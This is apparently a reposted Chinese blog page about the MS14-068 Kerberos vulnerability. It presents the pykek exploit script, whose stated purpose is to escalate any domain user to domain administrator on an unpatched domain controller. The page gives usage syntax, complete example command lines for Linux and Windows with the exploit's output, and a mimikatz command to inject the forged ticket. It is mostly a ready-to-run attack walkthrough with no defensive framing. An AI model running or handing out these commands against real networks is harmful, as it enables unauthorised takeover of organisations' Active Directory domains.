zoukankan      html  css  js  c++  java
  • MS14-068 privilege escalation PoC: 可以让任何域内用户提升为域管理员

    https://github.com/bidord/pykek

    ms14-068.py

    Exploits MS14-680 vulnerability on an un-patched domain controler of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups :

    Domain Users (513)
    Domain Admins (512)
    Schema Admins (518)
    Enterprise Admins (519)
    Group Policy Creator Owners (520)

    USAGE:

    ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr>

    OPTIONS:
        -p <clearPassword>
    --rc4 <ntlmHash>
    Example usage :

    Linux (tested with samba and MIT Kerberos)

    root@kali:~/sploit/pykek# python ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
    Password:
      [+] Building AS-REQ for dc-a-2003.dom-a.loc... Done!
      [+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done!
      [+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done!
      [+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done!
      [+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done!
      [+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done!
      [+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done!
      [+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done!
      [+] Creating ccache file 'TGT_user-a-1@dom-a.loc.ccache'... Done!
    root@kali:~/sploit/pykek# mv TGT_user-a-1@dom-a.loc.ccache /tmp/krb5cc_0


    On Windows

    python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
    mimikatz.exe "kerberos::ptc TGT_user-a-1@dom-a.loc.ccache" exit`

     

    http://zone.wooyun.org/content/17102

  • 相关阅读:
    CodeForces 385C Bear and Prime Numbers 素数打表
    ZOJ 2853 Evolution 【简单矩阵快速幂】
    矩阵快速幂学习笔记
    USACO The Tamworth Two 模拟
    USACO Money Systems Dp 01背包
    UASCO Zero Sum DFS + Stack
    USACO Cow Pedigrees 【Dp】
    USACO Longest Prefix 【水】
    USACO Party Lamps 【Binary code solvution】【规律】
    USACO Runaround Numbers 模拟
  • 原文地址:https://www.cnblogs.com/hookjoy/p/4147375.html
Copyright © 2011-2022 走看看